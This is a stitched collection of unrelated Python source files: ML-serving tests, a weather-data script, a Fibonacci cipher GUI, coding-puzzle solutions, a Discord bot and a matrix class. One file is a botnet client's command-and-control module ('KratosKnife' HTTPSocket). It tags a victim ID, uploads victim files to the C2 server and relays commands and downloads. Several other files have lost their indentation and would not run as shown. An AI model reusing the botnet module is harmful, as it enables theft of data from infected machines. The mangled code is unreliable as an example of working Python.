# Source: test/pytest/test_model_archiver.py — repo vvekic/serve @ f02a56bf (Apache-2.0)
import subprocess
import time
import os
import glob
import requests
import json
import test_utils
MODEL_SFILE_NAME = 'resnet18-f37072fd.pth'
def setup_module(module):
    test_utils.torchserve_cleanup()
    response = requests.get('https://download.pytorch.org/models/' + MODEL_SFILE_NAME,
                            allow_redirects=True)
    # Use a context manager so the file handle is closed after writing
    with open(test_utils.MODEL_STORE + "/" + MODEL_SFILE_NAME, 'wb') as model_file:
        model_file.write(response.content)


def teardown_module(module):
    test_utils.torchserve_cleanup()
def model_archiver_command_builder(model_name=None, version=None, model_file=None,
                                   serialized_file=None, handler=None,
                                   extra_files=None, force=False):
    cmd = "torch-model-archiver"
    if model_name:
        cmd += " --model-name {0}".format(model_name)
    if version:
        cmd += " --version {0}".format(version)
    if model_file:
        cmd += " --model-file {0}".format(model_file)
    if serialized_file:
        cmd += " --serialized-file {0}".format(serialized_file)
    if handler:
        cmd += " --handler {0}".format(handler)
    if extra_files:
        cmd += " --extra-files {0}".format(extra_files)
    if force:
        cmd += " --force"
    cmd += " --export-path {0}".format(test_utils.MODEL_STORE)
    return cmd
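For illustration, the command string the builder above composes can be seen in a self-contained sketch; here `export_path` is an explicit parameter (the real function reads `test_utils.MODEL_STORE`) and the file paths are placeholders, not the actual test fixtures.

```python
# Self-contained copy of the builder above; export_path is a parameter here
# and the sample paths are placeholders for the example.
def build_archiver_cmd(model_name=None, version=None, model_file=None,
                       serialized_file=None, handler=None,
                       extra_files=None, force=False,
                       export_path="/tmp/model_store"):
    cmd = "torch-model-archiver"
    if model_name:
        cmd += " --model-name {0}".format(model_name)
    if version:
        cmd += " --version {0}".format(version)
    if model_file:
        cmd += " --model-file {0}".format(model_file)
    if serialized_file:
        cmd += " --serialized-file {0}".format(serialized_file)
    if handler:
        cmd += " --handler {0}".format(handler)
    if extra_files:
        cmd += " --extra-files {0}".format(extra_files)
    if force:
        cmd += " --force"
    cmd += " --export-path {0}".format(export_path)
    return cmd

# Sample invocation showing the flag order the tests rely on
cmd = build_archiver_cmd("resnet-18", "1.0", "model.py",
                         "resnet18-f37072fd.pth", "image_classifier")
print(cmd)
```

Splitting this string on spaces, as the tests do, only works because none of the paths contain spaces.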
def create_resnet_archive(model_name="resnet-18", version="1.0", force=False):
    cmd = model_archiver_command_builder(
        model_name,
        version,
        "{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
        "{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
        "image_classifier",
        "{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD),
        force
    )
    print(cmd)
    cmd = cmd.split(" ")
    return subprocess.run(cmd).returncode
def clean_mar_file(mar_name):
    path = os.path.join(test_utils.MODEL_STORE, mar_name)
    if os.path.exists(path):
        os.remove(path)
def test_multiple_model_versions_registration():
    # Download resnet-18 model
    create_resnet_archive("resnet-18", "1.0")
    create_resnet_archive("resnet-18_v2", "2.0")
    test_utils.start_torchserve(no_config_snapshots=True)
    test_utils.register_model("resnet18", "resnet-18.mar")
    test_utils.register_model("resnet18", "resnet-18_v2.mar")
    time.sleep(5)
    response = requests.get('http://localhost:8081/models/resnet18/all')
    print(response.content)
    # Verify that we can use the list models api to get all versions of resnet-18
    assert len(json.loads(response.content)) == 2
def test_duplicate_model_registration_using_local_url_followed_by_http_url():
    # Registration through local mar url is already complete in the previous test case.
    # Now try to register the same model using an http url in this next step.
    response = test_utils.register_model(
        "resnet18", "https://torchserve.pytorch.org/mar_files/resnet-18.mar")
    time.sleep(15)
    if json.loads(response.content)['code'] == 500 and \
            json.loads(response.content)['type'] == "InternalServerException":
        assert True, "Internal Server Exception, " \
                     "Model file already exists!! Duplicate model registration request"
        test_utils.unregister_model("resnet18")
        time.sleep(10)
    else:
        assert False, "Something is not right!! Successfully re-registered existing model"
def test_duplicate_model_registration_using_http_url_followed_by_local_url():
    # Register using http url
    clean_mar_file("resnet-18.mar")
    response = test_utils.register_model(
        "resnet18", "https://torchserve.pytorch.org/mar_files/resnet-18.mar")
    create_resnet_archive()
    response = test_utils.register_model("resnet18", "resnet-18.mar")
    if json.loads(response.content)['code'] == 409 and \
            json.loads(response.content)['type'] == "ConflictStatusException":
        assert True, "Conflict Status Exception, " \
                     "Duplicate model registration request"
        response = test_utils.unregister_model("resnet18")
        time.sleep(10)
    else:
        assert False, "Something is not right!! Successfully re-registered existing model"
def test_model_archiver_to_regenerate_model_mar_without_force():
    clean_mar_file("resnet-18.mar")
    response = create_resnet_archive("resnet-18", "1.0")
    response = create_resnet_archive("resnet-18", "1.0")
    try:
        assert 0 != response, "Mar file couldn't be created. Use the -f option"
    finally:
        for f in glob.glob("resnet*.mar"):
            os.remove(f)
def test_model_archiver_to_regenerate_model_mar_with_force():
    clean_mar_file("resnet-18.mar")
    response = create_resnet_archive("resnet-18", "1.0")
    response = create_resnet_archive("resnet-18", "1.0", force=True)
    try:
        assert 0 == response, "Mar file should have been regenerated with the -f option"
    finally:
        for f in glob.glob("resnet*.mar"):
            os.remove(f)
def test_model_archiver_without_handler_flag():
    cmd = model_archiver_command_builder(
        "resnet-18",
        "1.0",
        "{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
        "{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
        None,
        "{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
    )
    cmd = cmd.split(" ")
    try:
        assert 0 != subprocess.run(cmd).returncode, "Mar file couldn't be created. " \
                                                    "No handler specified"
    finally:
        for f in glob.glob("resnet*.mar"):
            os.remove(f)
def test_model_archiver_without_model_name_flag():
    cmd = model_archiver_command_builder(
        None,
        "1.0",
        "{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
        "{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
        "image_classifier",
        "{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
    )
    cmd = cmd.split(" ")
    assert 0 != subprocess.run(cmd).returncode, "Mar file couldn't be created. " \
                                                "No model_name specified"
def test_model_archiver_without_model_file_flag():
    cmd = model_archiver_command_builder(
        "resnet-18",
        "1.0",
        None,
        "{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
        "image_classifier",
        "{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD),
        True
    )
    cmd = cmd.split(" ")
    try:
        assert 0 == subprocess.run(cmd).returncode
    finally:
        for f in glob.glob("resnet*.mar"):
            os.remove(f)
def test_model_archiver_without_serialized_flag():
    cmd = model_archiver_command_builder(
        "resnet-18",
        "1.0",
        "{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
        None,
        "image_classifier",
        "{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
    )
    cmd = cmd.split(" ")
    assert 0 != subprocess.run(cmd).returncode, "Mar file couldn't be created. " \
                                                "No serialized file specified"
# Source: scripts/isuag/zero_daily_precip.py — repo trentford/iem @ 7264d24f (MIT)
"""Sometimes we need to completely zero out precip for a day
Likely due to water being dumped into the tipping bucket to clean it :/
"""
from __future__ import print_function
import sys
import datetime
import pytz
from pyiem.util import get_dbconn
def zero_hourly(station, sts, ets):
    """Zero out the hourly data"""
    pgconn = get_dbconn('isuag')
    cursor = pgconn.cursor()
    for table in ['sm_hourly', 'sm_15minute']:
        cursor.execute("""
            UPDATE """ + table + """
            SET rain_mm_tot_qc = 0, rain_mm_tot_f = 'Z', rain_mm_tot = 0
            WHERE station = %s and valid > %s and valid <= %s
        """, (station, sts, ets))
        print("%s updated %s rows" % (table, cursor.rowcount))
    cursor.close()
    pgconn.commit()
def zero_daily(station, date):
    """Zero out the daily data"""
    pgconn = get_dbconn('isuag')
    cursor = pgconn.cursor()
    cursor.execute("""
        UPDATE sm_daily
        SET rain_mm_tot_qc = 0, rain_mm_tot_f = 'Z', rain_mm_tot = 0
        WHERE station = %s and valid = %s
    """, (station, date))
    print("sm_daily updated %s rows" % (cursor.rowcount, ))
    cursor.close()
    pgconn.commit()
def zero_iem(station, date):
    """Zero out the daily summary data"""
    pgconn = get_dbconn('iem')
    cursor = pgconn.cursor()
    cursor.execute("""
        UPDATE summary s
        SET pday = 0
        FROM stations t
        WHERE s.iemid = t.iemid and t.id = %s and t.network = 'ISUSM'
        and day = %s
    """, (station, date))
    print("summary updated %s rows" % (cursor.rowcount, ))
    cursor.close()
    pgconn.commit()
def main(argv):
    """Go Main"""
    station = argv[1]
    date = datetime.date(int(argv[2]), int(argv[3]), int(argv[4]))
    # Our weather stations are in CST, so the 'daily' precip is for a 6z to 6z
    # period and not a calendar day; the hourly values run in arrears
    sts = datetime.datetime(date.year, date.month, date.day, 6)
    sts = sts.replace(tzinfo=pytz.utc)
    ets = sts + datetime.timedelta(hours=24)
    zero_hourly(station, sts, ets)
    zero_daily(station, date)
    zero_iem(station, date)
if __name__ == '__main__':
    main(sys.argv)
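The 6z-to-6z window computed in `main()` can be sketched with the standard library alone, using `datetime.timezone.utc` in place of `pytz`; the date below is an arbitrary example.

```python
import datetime

date = datetime.date(2024, 1, 15)  # arbitrary example date
# CST 'daily' precip covers 06 UTC on this date through 06 UTC the next day
sts = datetime.datetime(date.year, date.month, date.day, 6,
                        tzinfo=datetime.timezone.utc)
ets = sts + datetime.timedelta(hours=24)
print(sts.isoformat(), "->", ets.isoformat())
```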
# Source: tests/test_upload_client.py — repo hepoo6/gdc-client @ 4453c641 (Apache-2.0)
from unittest import TestCase
from gdc_client.upload.client import create_resume_path
class UploadClientTest(TestCase):
def setup(self):
pass
def test_create_resume_path(self):
# don't need to test if there's no file given
# that is checked in multipart_upload()
tests = ["/path/to/file.yml", "path/to/file.yml", "file.yml"]
results = [
"/path/to/resume_file.yml",
"path/to/resume_file.yml",
"resume_file.yml",
]
for i, t in enumerate(tests):
assert create_resume_path(t) == results[i]
# Source: Fibonnacci GUI VERSION.py — repo Nuklear-s-Team/fibonacciThing @ 2b32f10a (CC0-1.0)
# Copyright 2020 Khang Nguyen and Tim Merrill
# Improved by Luzgog
# Made with the same translate function as the original.
import tkinter
from tkinter import messagebox
from tkinter import scrolledtext
from Fibonacci_Encoder import encode, decode, encodeReversed, decodeReversed, randomGen, encodeRandom, generatefromkey, decodeRandom
root = tkinter.Tk(className="Fibonacci Encoder")
root.resizable(0, 0)
help = tkinter.Toplevel(width=90, height=90)
help.withdraw()
translations = tkinter.Toplevel(width=90, height=90)
translations.withdraw()
lol = tkinter.StringVar()
mode = tkinter.StringVar()
lastTranslation = tkinter.StringVar()
remTrue = tkinter.IntVar()
key = tkinter.StringVar()
lastTranslation.set("Last Tranlsation: None")
currentTranslation = ""
#root.iconphoto(False, tkinter.PhotoImage(file="icon.png"))
decodeNames = ["de", "decode", "De", "Decode", "d", "D"]
encodeNames = ["en", "encode", "En", "Encode", "e", "E"]
def showHelp():
    help.deiconify()


def closeHelp():
    help.withdraw()


def error():
    messagebox.showerror("Error", "Invalid Input")


def keyMissingError():
    messagebox.showerror("Error", "No Key")
def translate():
    global currentTranslation
    task = lol.get()
    message = T.get()
    version = mode.get()
    getKey = RandomEncode.get()
    totranslate = ""  # fallback so the later insert doesn't fail if translation errors
    T.delete(0, tkinter.END)
    if task in encodeNames:
        if version == "Regular":
            try:
                totranslate = encode(message)
            except BaseException:
                error()
        elif version == "Reversed":
            try:
                totranslate = encodeReversed(message)
            except BaseException:
                error()
        elif version == "Random":
            try:
                if getKey == "":
                    randomDict, key2 = randomGen()
                    key.set(key2)
                    key2 = ''
                    totranslate = encodeRandom(message, randomDict)
                    getKey = ""
                    randomDict = {}
                else:
                    totranslate = encodeRandom(message, generatefromkey(getKey))
                    getKey = ""
            except BaseException:
                error()
    elif task in decodeNames:
        if version == "Regular":
            try:
                totranslate = decode(message)
            except BaseException:
                error()
        elif version == "Reversed":
            try:
                totranslate = decodeReversed(message)
            except BaseException:
                error()
        elif version == "Random":
            if getKey == "":
                keyMissingError()
            else:
                totranslate = decodeRandom(message, generatefromkey(getKey))
    T.insert(tkinter.END, totranslate)
    link.config(state=tkinter.NORMAL)
    keyDisplay.config(state=tkinter.NORMAL)
    link.delete(1.0, tkinter.END)
    keyDisplay.delete(1.0, tkinter.END)
    mode2 = mode.get()
    link.insert(1.0, "Last Translation: (" + mode2 + " Mode) " + message + " <-> " + totranslate)
    currentTranslation = "(" + mode2 + " Mode) " + message + " <-> " + totranslate
    keyDisplay.insert(1.0, str(key.get()))
    key.set("")
    link.config(state=tkinter.DISABLED)
    keyDisplay.config(state=tkinter.DISABLED)
def updateSaves():
    saves.config(state=tkinter.NORMAL)
    saves.delete(1.0, tkinter.END)
    with open("savedTranslations.txt", "r") as file:
        textIn = file.read()
    saves.insert(1.0, textIn)
    saves.config(state=tkinter.DISABLED)
# insert text
def saveTranslation():
    global currentTranslation
    with open("savedTranslations.txt", 'a') as file:
        file.write("\n\n")
        file.write(currentTranslation)
    updateSaves()
# save file
def clearSaves():
    with open("savedTranslations.txt", "w") as file:
        file.write("")
    updateSaves()


def openTrans():
    translations.deiconify()


def closeTrans():
    translations.withdraw()


def copyKey():
    root.clipboard_clear()
    root.clipboard_append(keyDisplay.get(1.0, tkinter.END))
def remember():
    if remTrue.get() == 0:
        with open("savedKey.txt", "w") as file:
            file.write("")
    else:
        with open("savedKey.txt", "w") as file:
            file.write(RandomEncode.get())
def initialize():
    saveTranslation()
    with open("savedKey.txt", "r") as file:
        key3 = file.read()
    if key3 == "":
        pass
    else:
        RandomEncode.insert(1, key3)
Encode = tkinter.Radiobutton(root, text='Encode', variable=lol, value="Encode", indicatoron=0, width=42, selectcolor="light green").grid(row=1, column=0, sticky=tkinter.W)
Decode = tkinter.Radiobutton(root, text='Decode', variable=lol, value="Decode", indicatoron=0, width=42, selectcolor="light green").grid(row=1, column=1, sticky=tkinter.E)
Regular = tkinter.Radiobutton(root, text='Regular', variable=mode, value="Regular", indicatoron=0, width=42, selectcolor="cyan").grid(row=4, column=0, sticky=tkinter.W)
Reversed = tkinter.Radiobutton(root, text='Reversed', variable=mode, value="Reversed", indicatoron=0, width=42, selectcolor="cyan").grid(row=4, column=1, sticky=tkinter.E)
Random = tkinter.Radiobutton(root, text="Use Random Dictionary", variable=mode, value="Random", indicatoron=0, width=42, selectcolor="gold").grid(row=5, column=0, sticky=tkinter.N)
RandomEncode = tkinter.Entry(root, width=48)
RandomEncode.grid(row=5, column=1)
J = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="--------------------------------------------------------Mode--------------------------------------------------------")
J.set(100)
J.grid(row=0, sticky=tkinter.N, columnspan=2)
R = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="--------------------------------------------Key Sets--------------------------------------------")
R.set(100)
R.grid(row=3, sticky=tkinter.N, columnspan=2)
T = tkinter.Entry(root, width=100)
L = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="------------------------------------------Input Below------------------------------------------")
L.set(100)
L.grid(row=6, sticky=tkinter.N, columnspan=2)
T.grid(row=7, column=0, sticky=tkinter.W, columnspan=2)
X = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200)
X.set(100)
X.grid(row=8, sticky=tkinter.N, columnspan=2)
Translate = tkinter.Button(root, text="Translate", command=translate, width=42, activebackground="light green").grid(row=9, column=0, sticky=tkinter.W)
Quit = tkinter.Button(root, text="Quit", command=root.quit, width=85, activebackground="red").grid(row=10, columnspan=2, sticky=tkinter.E)
T.insert(tkinter.END, "")
Help = tkinter.Button(root, text="Help", command=showHelp, width=42, activebackground="blue").grid(row=9, column=1)
X = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200)
X.set(100)
X.grid(row=11, sticky=tkinter.N, columnspan=2)
link = scrolledtext.ScrolledText(root, width=65, height=5, wrap="word", font="consolas", state=tkinter.DISABLED)
link.grid(row=12, sticky=tkinter.W, columnspan=2)
uti = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="-------------------------------------------------------Utilities-------------------------------------------------------")
uti.set(100)
uti.grid(row=13, sticky=tkinter.N, columnspan=2)
save = tkinter.Button(root, text="Save this translation", command=saveTranslation, width=42, activebackground="light green").grid(row=14, column=0, sticky=tkinter.N)
copy = tkinter.Button(root, text="Copy this key", command=copyKey, width=42, activebackground="light green").grid(row=14, column=1, sticky=tkinter.N)
openTranslations = tkinter.Button(root, text="Open Saved Translations", command=openTrans, width=42, activebackground="light green").grid(row=15, column=0, sticky=tkinter.N)
rememberKey = tkinter.Checkbutton(root, text="Remember my key", var=remTrue, command=remember).grid(row=15, column=1, sticky=tkinter.N)
keyDisplay = scrolledtext.ScrolledText(root, height=0.5, width=73, wrap="word", state=tkinter.DISABLED)
keyDisplay.grid(row=16, sticky=tkinter.W, columnspan=2)
info = tkinter.Label(root, text="Created by Khang Nguyen and Luzgog. Github link: https://github.com/PG-Development/Fibonacci-Encoder")
info.grid(row=17, sticky=tkinter.E, columnspan=2)
# help window below
title = tkinter.Label(help, text="Help Menu").grid(row=0, sticky=tkinter.N)
helpText = scrolledtext.ScrolledText(help, width=65, height=20, wrap="word")
helpText.grid(row=1, sticky=tkinter.N)
helpText.insert(1.0, "Thanks for downloading this encoder! My team and I have worked hard on it. \n \n"
"Important: When you want to close this, do NOT press the x at the top right. Press the exit help menu button at the bottom.\n \n"
"When you download this repository, you should have gotten 2 .py files: the Fibonacci_Encoder, and the Fibonacci GUI Version file. "
"Make sure they are in the same folder. The GUI Version is the much more convenient version of this program, but it uses the same functions. "
"When you open up the GUI file, you should see a small window pop up on your screen. This is the main application window, built with tkinter. "
"You select your mode at the top, choosing from either Encode, Decode, or Decode from Random. To encode from a random, select Encode from random in the keysets. "
"Below those, you should see keysets. You have regular, reversed, and encode from random. Next to both of the random choices you see inputs. "
"Below the modes and keysets you see an input, to place your text inside, and this is where the message will come out. \n \n"
"Regular Mode\n"
"Regular mode is the base mode of this encoder. It uses a set dictionary of keys and items, to encode your message. "
"To use this mode, simply choose the \"Encode\" mode and the \"Regular\" Keyset. Once you press translate, your message will be replaced "
"by the encoded version. Below your output, there is a last translation box which shows you the original. "
"To decode, just switch your mode to decode, and input the code you received from your friend into the box. "
"It should change before your very eyes into comprehensible text.\n\n"
"Reversed Mode\n"
"Reversed mode is a separate, different keyset then the regular mode. It takes the code for a letter, and switches it around to the opposite letter. "
"For example, the code for a is now the code for z, and the code for b is now the code for y. This means the code for z is now the code for a, and so on. "
"To use this keyset, choose which mode you want, and then instead of selecting the \"Regular\" keyset, choose the \"Reversed\" keyset.\n\n"
"Random Mode\n"
"Random Mode scrambles the codes for the letters to random locations. The total number of possible dictionaries is 403,291,461,126,605,635,584,000,000, aka 403 septillion. "
"That's a lot of possible combinations! And every time you use it, it generates a random choice. Now, that's cool, but say you want to retrieve an already generated "
"dictionary. That's easy! You see, whenever you generate a new dictionary, a key will appear in the lower text box. Just press the \"Copy this key\" buttton "
"to copy the key.\n\n"
"To encode using this mode, you first select the \"Encode\" Button. Then select the \"Use Random Dictionary\" choice. If you already have a key, put it in the "
"entry box next to the button. If you do not have a key, simply leave the box blank. Then press translate. You should get a result and a key. If you want to now encode "
"more messages using the same key, just copy the key and put it in the box. When you send messages to someone else, send them the key privately, so then you can"
" send them the message in public and other people will get gibberish.\n\n"
"To decode using this mode, you must have a key, or else you will get an error. Put the key in the box next to \"Use Random Dictionary\". Then select \"Decode\" "
"and \"Use Random Dictionary\". Finally, put in the message in the lower entry box. When you press Translate, you should get a good message.\n\n"
"Utilities\n"
"There are 3 utilities buttons: the \"Save this translation\" button, the \"Copy this key\" button, and the \"Open Saved Translations\" button. "
"These are here to help you use the app more efficiently.\n\n"
"The \"Save This Translations\" button takes the translation you just did and puts it into another text window that you can open. This text resets everytime you "
"close the app, so keep the app open go save your translations. This feature will be improved in the future to save the translation to a text file. To open this text "
"window, just press the \"Open Saved Translations\" button. The \"Copy This Key\" button just copies the key if you have one.\n\n"
"A new feature is the \"Remember my key\" feature, which can save your key for another time. Whenever you want to save your key, just check it. To update your "
"key, you must uncheck it and then recheck it to make changes to the .txt file. If you want to use this feature, you must download the savedKey.txt file. To "
"reset your key, you can just uncheck it again.")
helpText.tag_add("important", "3.0", "3.9")
helpText.tag_add("regularTag", "7.0", "7.12", "10.0", "10.13", "13.0", "13.12", "20.0", "20.9")
helpText.tag_config("important", foreground="red", font=("Consolas", 13, "bold", "italic"))
helpText.tag_config("regularTag", foreground="blue", font=("Consolas", 12, "bold", "italic"))
helpText.config(state=tkinter.DISABLED)
closeHelpButton = tkinter.Button(help, text="Exit Help Menu", command=closeHelp, activebackground="red").grid(row=2, sticky=tkinter.N)
# saved translations below
titleTrans = tkinter.Label(translations, text="Saved Translations").grid(row=0, sticky=tkinter.N)
saves = scrolledtext.ScrolledText(translations, width=65, height=20, wrap="word")
saves.grid(row=1, sticky=tkinter.N)
saves.config(state=tkinter.DISABLED)
closeTransButton = tkinter.Button(translations, text="Exit Saved Translations", command=closeTrans, activebackground="red", width=38).grid(row=2, sticky=tkinter.W)
clearSavesButton = tkinter.Button(translations, text="Clear Saves", command=clearSaves, activebackground="red", width=38).grid(row=2, sticky=tkinter.E)
initialize()
tkinter.mainloop()
# File: My Tools/Number Reverse/numberReverse.py
# Repo: AbhyasKanaujia/Project-Euler (MIT license)
num = int(input("Enter a number: "))
temp = num
reverse = 0
while(temp):
reverse = (reverse * 10) + (temp % 10)
    temp //= 10  # floor division; int(temp / 10) loses precision for very large numbers
print("Reversed: " + str(reverse))
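The same digit-reversal loop, wrapped in a function so the result can be checked against Python's string slicing (a sketch; `reverse_number` is a hypothetical helper, the script above reads its input interactively):

```python
def reverse_number(n):
    """Reverse the digits of a non-negative integer."""
    reverse = 0
    while n:
        reverse = reverse * 10 + n % 10
        n //= 10
    return reverse

print(reverse_number(1234))  # → 4321
```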
# File: Botnet-Generator/HTTPSocket.py
# Repo: m4ta1l/KratosKnife (BSD-3-Clause license)
import requests
import base64
class HTTPSocket:
def __init__(self, host, victim_id):
self.host = host
self.victim_id = victim_id
def _GET(self, filename, request):
requests.get(url=self.host + filename, params=request)
def _POST(self, filename, request):
requests.post(url=self.host + filename, data=request)
def Upload(self, filepath):
url = self.host + "upload.php"
files = {'file': open(filepath, 'rb')}
victim_id = { 'id' : base64.b64encode(str(self.victim_id).encode('UTF-8'))}
requests.post(url, files=files, params=victim_id)
def Connect(self, clientdata):
payload = { 'data': base64.b64encode(clientdata.encode('UTF-8')) }
self._GET("connection.php", payload)
def Send(self,command):
payload = {'command': base64.b64encode(command.encode()), 'vicID': base64.b64encode(str(self.victim_id).encode())}
self._GET("receive.php", payload)
def Log(self, type, message):
self.Send("NewLog" + "|BN|" + type + "|BN|" + message)
    def Download(self, url, destinationPath):
        response = requests.get(url)
        with open(destinationPath, 'wb') as out_file:  # context manager closes the handle
            out_file.write(response.content)
# File: Binary Search/081. Search in Rotated Sorted Array II.py
# Repo: beckswu/Leetcode (MIT license)
"""
81. Search in Rotated Sorted Array II
"""
class Solution:
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: bool
"""
l, r, n = 0, len(nums)-1, len(nums)
while l<=r:
while r>l and nums[l+1]==nums[l]:
l+=1
while r>l and nums[r-1] == nums[r]:
r-=1
mid = (l+r)>>1
if nums[mid] == target: return True
if target > nums[mid]:
if nums[l]>nums[mid] and nums[l]<=target: r = mid-1
else: l = mid+1
else:
if nums[mid]>nums[r] and nums[r]>=target: l = mid+1
else: r = mid-1
return False
# File: PEPit/tools/__init__.py
# Repo: bgoujaud/PEPit (MIT license)
from .dict_operations import merge_dict, prune_dict, multiply_dicts
__all__ = ['dict_operations',
'merge_dict',
'prune_dict',
'multiply_dicts',
]
# File: methods/ham.py
# Repo: vickyyu90/maxnet (Apache-2.0 license)
import numpy as np
import torch
import torch.nn.functional as F
class FeatureExtractor():
def __init__(self, model, intermediate_layers):
self.model = model
self.intermediate_layers = intermediate_layers[::-1]
self.weights = []
self.num = len(self.intermediate_layers)
self.activations = []
def save_weight(self, grad):
self.weights.append(grad)
def __call__(self, x, intermediate_layers, class_idx):
hams = []
logit, conv3, conv4, conv5 = self.model(x)
        logit = F.softmax(logit, dim=1)  # explicit dim; the implicit default is deprecated
score = logit[:, class_idx].squeeze()
if torch.cuda.is_available():
score = score.cuda()
self.model.zero_grad()
score.backward(retain_graph=True)
        # aggregate a normalised, class-discriminative map from each conv stage
        for name, conv in zip(('conv3', 'conv4', 'conv5'), (conv3, conv4, conv5)):
            saliency_map = torch.mul(conv, self.model.grads[name]).mean(dim=1, keepdim=True)
            norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
            hams.append(F.relu(norm_saliency_map, inplace=True))
return hams
class HAM():
def __init__(self, model, intermediate_layers):
self.model = model
self.intermediate_layers = intermediate_layers
self.extractor = FeatureExtractor(self.model, intermediate_layers)
def __call__(self, input, device, intermediate_layers, class_idx):
hams = self.extractor(input, intermediate_layers, class_idx)
for i in range(len(intermediate_layers)):
if i == 0:
aggregated_ham = hams[i]
else:
tmp = F.interpolate(hams[i], hams[0].shape[-3:], mode='trilinear', align_corners=False)
aggregated_ham = torch.mul(tmp, torch.ge(tmp, aggregated_ham)) + torch.mul(aggregated_ham, torch.ge(aggregated_ham, tmp))
B, L, C, H, W = aggregated_ham.shape
aggregated_ham = aggregated_ham.view(B, -1)
aggregated_ham -= aggregated_ham.min(dim=1, keepdim=True)[0]
aggregated_ham /= aggregated_ham.max(dim=1, keepdim=True)[0]
aggregated_ham = aggregated_ham.view(B, L, C, H, W)
aggregated_ham = F.interpolate(aggregated_ham, input.shape[-3:], mode='trilinear', align_corners=False)
        return aggregated_ham
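The per-map min-max normalisation used in both classes above rescales every saliency map into [0, 1]; a toy sketch of the same arithmetic with plain lists (torch-free, for illustration only):

```python
values = [0.2, 0.8, 1.0, 0.5]
lo, hi = min(values), max(values)
# (v - min) / (max - min) maps the smallest value to 0 and the largest to 1
norm = [(v - lo) / (hi - lo) for v in values]
print(norm[0], norm[2])  # → 0.0 1.0
```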
# File: wicket/commands/__init__.py
# Repo: GeekMasher/wicket-discord-docker-bot (MIT license)
import discord
from wicket.commands.list import botListServices
from wicket.commands.docker_commands import *
async def botHelp(cxt, message: discord.Message, **kwargs):
TEXT = "Help Options:\n"
for name, command in COMMANDS.items():
TEXT += f" - `{cxt.__PREFIX__} {name}` - {command.get('description')}"
if command.get("auth"):
TEXT += " (auth required)"
TEXT += "\n"
await message.channel.send(TEXT)
COMMANDS = {
"help": {"func": botHelp, "auth": False, "description": "Get help with the bot"},
"list": {
"func": botListServices,
"auth": False,
"description": "Get a list of services",
},
"start": {
"func": botStartServices,
"auth": True,
"description": "Start a service",
},
"restart": {
"func": botRestartServices,
"auth": True,
"description": "Restart a service",
},
"stop": {
"func": botStopServices,
"auth": True,
"description": "Stop a service",
},
"update": {
"func": botUpdateServices,
"auth": True,
"description": "Update the service",
},
}
# File: rl_helper/__init__.py
# Repo: yiwc/rl_helper (MIT license)
from rl_helper.envhelper import envhelper, VDisplay
from rl_helper.fps import fps
from rl_helper.exps import ExperimentManager
# File: abstract_matrix.py
# Repo: sredroboto/math-matrix (BSD-3-Clause license)
from abc import ABC, abstractmethod
class AbstractMatrix(ABC):
"""
    Class used to represent a matrix
"""
def __init__(self, rows, cols, data = []):
"""
Args:
            rows: Number of rows in the matrix
            cols: Number of columns in the matrix
            data: List with the matrix values;
                if the list is empty the matrix is filled with zeros
"""
self.rows = rows
self.cols = cols
self._init_data(data)
@abstractmethod
def __getitem__(self, key):
        """Retrieves a value stored in the matrix.
        Retrieves the value stored at position i, j. Matrix indexing starts at 1.
        Args:
            key: Tuple containing the values of i and j
        Returns:
            data: The value stored at position i, j
"""
pass
@abstractmethod
def __setitem__(self, key, value):
        """Stores a value in the matrix.
        Stores a value at position i, j. Matrix indexing starts at 1.
        Args:
            key: Tuple containing the values of i and j
            value: Value to be stored in the matrix
"""
pass
@abstractmethod
def __repr__(self):
        """String representation of the matrix.
        Displays the stored data in matrix format when the object is evaluated
        without any method invocation.
        Returns:
            Displays the matrix data formatted on the console. For example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
1.0000 2.0000
3.0000 4.0000
"""
pass
@abstractmethod
def __str__(self):
        """String representation of the matrix during conversion.
        Displays the stored data in matrix format when the object is converted
        to a string.
        Returns:
            Displays the matrix data formatted on the console. For example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
1.0000 2.0000
3.0000 4.0000
"""
pass
@abstractmethod
def __radd__(self, other):
        """Adds the matrix as the right-hand operand.
        Adds the matrix, as the right-hand operand, to another matrix or scalar.
        Adding two matrices requires both to have the same size; when adding a
        scalar to the matrix, the scalar is added to each element of the matrix.
        Args:
            other: Matrix or scalar to be added to the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b + a
#> c
3.0000 6.0000
9.0000 12.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 + a
#> c
3.0000 4.0000
5.0000 6.0000
"""
pass
@abstractmethod
def __add__(self, other):
        """Adds the matrix as the left-hand operand.
